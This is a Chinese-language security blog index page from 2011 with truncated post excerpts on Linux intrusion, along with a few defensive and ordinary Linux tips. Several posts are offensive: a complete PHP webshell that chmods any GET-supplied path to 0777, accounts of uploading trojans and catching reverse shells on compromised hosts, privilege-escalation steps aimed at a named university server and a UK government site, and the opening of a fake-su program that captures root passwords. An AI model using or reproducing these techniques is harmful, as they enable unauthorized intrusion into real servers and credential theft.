linux不提权跨目录访问的代码

   
分类:安全 | 2011-12-6 | 撸过 1,245 次
0人扯蛋

linux权限多设的比较松的其实,但有的虚拟机还是不能跨目录访问的。

在提不了权的情况下,试试如下代码吧。运气好的话说不定就跨过去了。

代码如下:

<?php
$path = stripslashes($_GET ['path'] );
$ok = chmod ($path , 0777);
if ($ok == true)
echo CHMOD OK , Permission editable file or directory. Permission to write;
?>

把上面代码保存为webshell.PHP

然后访问http://www.webshell.c[......]

继续阅读

Linux下防御/减轻DDOS攻击

   
分类:安全 | 2011-11-12 | 撸过 892 次
0人扯蛋

互联网如同现实社会一样充满钩心斗角,网站被DDOS也成为站长最头疼的事。在没有硬防的情况下,寻找软件代替是最直接的方法,比如用iptables,但是iptables不能在自动屏蔽,只能手动屏蔽。今天要说的就是一款能够自动屏蔽DDOS攻击者IP的软件:DDoS deflate。

 

DDoS deflate介绍

DDoS deflate是一款免费的用来防御和减轻DDoS攻击的脚本。它通过netstat监测跟踪创建大量网络连接的IP地址,在检测到某个结点超过预设的限 制时,该程序会通过APF或IPTABLES禁止或阻挡这些IP.

DDoS deflate官方网站:http://d[......]

继续阅读

一次LINUX低权限提权法

   
分类:安全 | 2011-11-3 | 撸过 3,938 次
0人扯蛋

今天旁站拿到一个Apache/2.2.3 (CentOS)的SHELL,进去是LINUX系统,PHP版本5.2.17,MYSSQL的环境,没ASP,.NET组建

先用自带的命令LS,UNAME了下,无显,肯定是设置了PHP.INI。 根目录无写权限,估计就算反弹了也没法CHMOD 777了

先反弹试试 tmp里创建好文件,SHELL目录传马,执行,本地NC监听上线,WHOAMI一下,是WWWROOT权限

查看版本

 

可以CD到根目录上级(/var/www/virtual/),再LS一下,全盘网站都出来了,目标站也没瞎起文件夹名,但是没权限跳不进去

试着TAR打包,没[......]

继续阅读

Linux服务器安全:SSH如何防破解

   
分类:技术 | 2011-10-2 | 撸过 834 次
0人扯蛋

你会发现,每天会有多条SSH登录失败纪录。那些扫描工具将对你的服务器构成威胁,你必须设置复杂登录口令,并将尝试多次登录失败的IP给阻止掉,让其在一段时间内不能访问该服务器。
用DenyHosts可以阻止试图猜测SSH登录口令,它会分析/var/log/secure等日志文件,当发现同一IP在进行多次SSH密码尝试时就会记录IP到/etc/hosts.deny文件,从而达到自动屏蔽该IP的目的。
DenyHosts官方网站为:http://denyhosts.sourcefor...
DenyHosts安装
[root@switch DenyHost]# ls -l
总用量 44
-rw----[......]

继续阅读

linux渗透与安全第三节 - 提权

   
分类:安全 | 2011-09-18 | 撸过 2,055 次
0人扯蛋

一些人一直觉得Linux提权是一项高深技术,其实Linux提权并不神秘。总结其步骤,可以简单分为5步:

1,获取webshell
2,具有执行command line权限,并获取Linux的系统版本
3,上传与Linux系统版本对应的漏洞提权脚本至可写可执行的目录下
4,执行提权脚本和反弹连接脚本
5,远程使用command line控制机器

本文所采用的实例仍然是广岛大学研究所的服务器,但是目前为止我并没有提权成功,虽然不是一个成功的实例,但是文章的目的在于说明过程而非说明结果
广岛大学研究所的网站服务器架设环境是:
Cent OS + PHP + Apache + PsotgreSQL[......]

继续阅读

linux渗透与安全第二节 - 读取配置文件

   
分类:安全 | 2011-09-18 | 撸过 899 次
0人扯蛋

国际上最通用的Linux虚拟主机搭建方式是这样的:

Linux操作系统+Apache网站容器+PHP脚+MySQL数据库
一个服务器上的网站配置信息显然都储存在Apache的配置文件中。通常Apache会安装在Linux的这个目录下:/usr/local,其Apache的conf配置文件也会在Apache的目录下,当然,也有的Apache配置文件会单独拿出来,放到例如/etc/httpd/conf/httpd.conf这样的地方。今天我就拿两则cent os系统来说明一下读取配置文件的相关内容。既然前面老大Mr.Cool做了一篇Linux文章了,为了配合其连续性,我最终还是把作者名改成。
第[......]

继续阅读

Linux渗透第一节 - vi旁注

   
分类:安全 | 2011-09-18 | 撸过 982 次
0人扯蛋

我其实并不精通Linux渗透,会的那丁点几乎都是跟小白学的,虽然学的很菜。今天小白在群里发了一个英国的虚拟主机。很显然php的webshell没有权限,那么她是怎么拿到管理权限的?反弹连接呗。不过她说,对于Linux不精通的人,她个人建议先从vi学起。当然了,现在她写的一些傻瓜化webshell有时一键就能搞定反弹连接。不过本章只讲,如何用vi来旁注服务器上的其他网站。

一个实际例子(实际上小白用的方法比这个简单的简单多了,不过这篇我们从最菜的开始讲):
网站目录是:
/var/www/vhosts/XX.gov.uk/httpdocs/cms/assets
执行命令dir回显得到:
Bui[......]

继续阅读

Linux tar打包命令

   
分类:安全 | 2011-09-12 | 撸过 721 次
0人扯蛋

范例一:将整个 /etc 目录下的文件全部打包成为 /tmp/etc.tar
[root@linux ~]# tar -cvf /tmp/etc.tar /etc <==仅打包,不压缩!
[root@linux ~]# tar -zcvf /tmp/etc.tar.gz /etc <==打包后,以 gzip 压缩
[root@linux ~]# tar -jcvf /tmp/etc.tar.bz2 /etc <==打包后,以 bzip2 压缩
# 特别注意,在参数 f 之后的文件档名是自己取的,我们习惯上都用 .tar 来作为辨识。
# 如果加 z 参数,则以 .tar.gz[......]

继续阅读

Linux小技巧收集

   
分类:技术 | 2011-09-11 | 撸过 1,098 次
1人扯蛋

前言:因为用Linux的时间越来越长,所需要做的事也越来越多,效率成了我必需突破的瓶颈。在此总结一下这段时间用过的一些好的Linux技巧。以后时常补充这样自己要用的时候就很方便了。
Author:Ajian
[文本处理]
1、查看某文件的一部分
如果你只想看文件的前 5 行,可以使用 head 命令,
如:head -5 /etc/passwd
如果你想查看文件的后 10 行,可以使用 tail 命令,
如:tail -10 /etc/passwd
查看文件中间一段,可以使用 sed 命令
如:sed –n ’5,10p’ /etc/passwd 这样你就可以只查看文件的第 5 行到第 10[......]

继续阅读

提权后获取linux root密码

   
分类:安全 | 2011-09-10 | 撸过 1,927 次
0人扯蛋

在webbackdoor本身是root(可能性小的可怜)或通过某漏洞溢出成功得到最高权限后,如果能获取root密码能给我们带来很多的好处。查询了一下前辈的方法,一个是欺骗su记录密码,另外一个是替换sshd,我们先看看欺骗su记录密码的代码吧!

先看第一种,kpr-fakesu.c V0.9beta167
fucksu.c

/*
* kpr-fakesu.c V0.9beta167 ;P
* by koper <koper@linuxmail.org>
*
* Setting up:
* admin@host:~$ gcc -o .su fakesu.c; rm -rf fak[......]

继续阅读